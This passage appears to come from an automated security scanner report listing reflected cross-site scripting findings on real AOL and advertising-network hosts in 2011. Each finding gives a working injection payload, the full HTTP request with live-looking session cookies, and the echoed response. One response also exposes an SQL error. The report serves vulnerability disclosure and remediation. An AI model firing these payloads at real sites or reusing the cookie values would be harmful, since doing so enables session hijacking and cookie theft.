Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 44284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/money174a7"><a>518d741443b/"/>
...[SNIP]...

1.210. http://smallbusiness.aol.com/category/money/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /category/money/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8fe7"><script>alert(1)</script>94d4958289d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/money/?e8fe7"><script>alert(1)</script>94d4958289d=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999976
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/money/?e8fe7"><script>alert(1)</script>94d4958289d=1"/>
...[SNIP]...

1.211. http://smallbusiness.aol.com/category/starting-a-business/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /category/starting-a-business/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6b07"><a>43900fd15f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/starting-a-businessd6b07"><a>43900fd15f2/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:11 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999955
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 44328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/starting-a-businessd6b07"><a>43900fd15f2/"/>
...[SNIP]...

1.212. http://smallbusiness.aol.com/category/starting-a-business/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /category/starting-a-business/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06dc"><script>alert(1)</script>c0f94426d7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/starting-a-business/?b06dc"><script>alert(1)</script>c0f94426d7b=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 79328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/starting-a-business/?b06dc"><script>alert(1)</script>c0f94426d7b=1"/>
...[SNIP]...

1.213. http://sports.aol.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c was submitted in the REST URL parameter 1. This input was echoed as 3ed00--><img src=a onerror=alert(1)>6108271377c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a3ed00--><img%20src%3da%20onerror%3dalert(1)>6108271377c HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:20:49 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24927
Connection: close
Content-Length: 24927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--req:101x1_1.us.sports20.a3ed00--><img src=a onerror=alert(1)>6108271377c.broadband ad:none (recursion blocked at default(mn=0)) -->
...[SNIP]...

1.214. http://sports.aol.com/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /a

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96673"-alert(1)-"6a5552da2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a96673"-alert(1)-"6a5552da2b6 HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/ee570--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8e55749f635
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2393099708.3390197069.4049274368; bandType=broadband; s_pers=%20s_getnr%3D1297023681276-Repeat%7C1360095681276%3B%20s_nrgvo%3DRepeat%7C1360095681299%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:20:48 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24818
Connection: close
Content-Length: 24818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld30 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.sports";
s_265.trackExternalLinks="true";
s_265.prop1="a96673"-alert(1)-"6a5552da2b6";
s_265.pfxID="spr";
s_265.disablepihost=false;
s_265.prop12="http://sports.aol.com/a96673\"-alert(1)-\"6a5552da2b6";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)d
...[SNIP]...

1.215. http://sports.aol.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87de0</script><script>alert(1)</script>d5d06ef2b0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:29 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24922
Connection: close
Content-Length: 24922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<";
s_265.pfxID="spr";
s_265.disablepihost=false;
s_265.prop12="http://sports.aol.com/favicon.ico87de0</script><script>alert(1)</script>d5d06ef2b0a";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.216. http://sports.aol.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 was submitted in the REST URL parameter 1. This input was echoed as ee570--><img src=a onerror=alert(1)>8e55749f635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ee570--><img%20src%3da%20onerror%3dalert(1)>8e55749f635 HTTP/1.1
Host: sports.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; dcisid=2334838204.3457568077.2591753984; bandType=broadband; s_pers=%20s_getnr%3D1297023600701-Repeat%7C1360095600701%3B%20s_nrgvo%3DRepeat%7C1360095600703%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.0 404 Not Found
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:33 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
ntCoent-Length: 24922
Connection: close
Content-Length: 24922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--req:101x1_1.us.sports20.ee570--><img src=a onerror=alert(1)>8e55749f635.broadband ad:none (recursion blocked at default(mn=0)) -->
...[SNIP]...

1.217. http://sports.aol.com/scores [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /scores

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d396"-alert(1)-"2e6570a7b85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scores6d396"-alert(1)-"2e6570a7b85 HTTP/1.1
Host: sports.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.3390197069.4049274368; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:11:06 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 24843
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld03 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.sports";
s_265.trackExternalLinks="true";
s_265.prop1="scores6d396"-alert(1)-"2e6570a7b85";
s_265.pfxID="spr";
s_265.disablepihost=false;
s_265.prop12="http://sports.aol.com/scores6d396\"-alert(1)-\"2e6570a7b85";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_c
...[SNIP]...

1.218. http://sports.aol.com/scores [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.aol.com
Path:   /scores

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec was submitted in the REST URL parameter 1. This input was echoed as 35d9f--><img src=a onerror=alert(1)>cac995bf9ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scores35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec HTTP/1.1
Host: sports.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.320032077.861537792; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:11:08 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 24952
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:
...[SNIP]...
<!--req:101x1_1.us.sports20.scores35d9f--><img src=a onerror=alert(1)>cac995bf9ec.broadband ad:none (recursion blocked at default(mn=0)) -->
...[SNIP]...

1.219. http://switcher.dmn.aol.com/sw/a [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://switcher.dmn.aol.com
Path:   /sw/a

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a695d<script>alert(1)</script>02c8710ec0a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sw/a?callback=parseSLa695d<script>alert(1)</script>02c8710ec0a&sch=afc-weblogs-xml&ssch=autoblog_2009&surl=http%3A//www.autoblog.com/%3Fb6c46%2522-alert%28document.cookie%29-%25228a56f02ab0f%3D1&snum=6&of=js&rv=1.3&shints=automobile HTTP/1.1
Host: switcher.dmn.aol.com
Proxy-Connection: keep-alive
Referer: http://www.autoblog.com/?b6c46%22-alert(document.cookie)-%228a56f02ab0f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:28:41 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 3342
Content-Length: 3342


       sponsorData = [

       {
       
               title:'Audi (Official Site)'
           

                                                                   , url:'www.AudiUSA.com'
           
           
                           , d1:'Say Goodnight To Old Luxury And'
           
...[SNIP]...
<!-- CitySearch PFP -->        
       

                                                                               }
   
];


parseSLa695d<script>alert(1)</script>02c8710ec0a(sponsorData);


1.220. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f89'%3balert(1)//89b3aef460a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69f89';alert(1)//89b3aef460a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?69f89'%3balert(1)//89b3aef460a=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 21:52:52 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Sun, 07-Feb-2016 03:52:52 GMT; path=/; domain=.mmismm.com
Content-Length: 493
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?69f89';alert(1)//89b3aef460a=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'&mm_pub='+mm_client+'&mm_channel='+mm_channel+'">
...[SNIP]...

1.221. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload d748a<script>alert(1)</script>483d9c82222 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567d748a<script>alert(1)</script>483d9c82222&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:11 GMT
Expires: Sun, 06 Feb 2011 20:38:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDSSCBB=KOKDELMCNDFPCJFLBIEHNFFB; path=/
X-Powered-By: ASP.NET
Content-Length: 1000
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'd748a'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 20031, @campaignId = 6035, @syndicationOutletId = 44418, @adrotationId = 14567d748a<script>alert(1)</script>483d9c82222, @ipAddress = '173.193.214.243', @sessionId = '750039506', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4
...[SNIP]...

1.222. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 9f9f9<script>alert(1)</script>58e0364ee35 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=200319f9f9<script>alert(1)</script>58e0364ee35&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
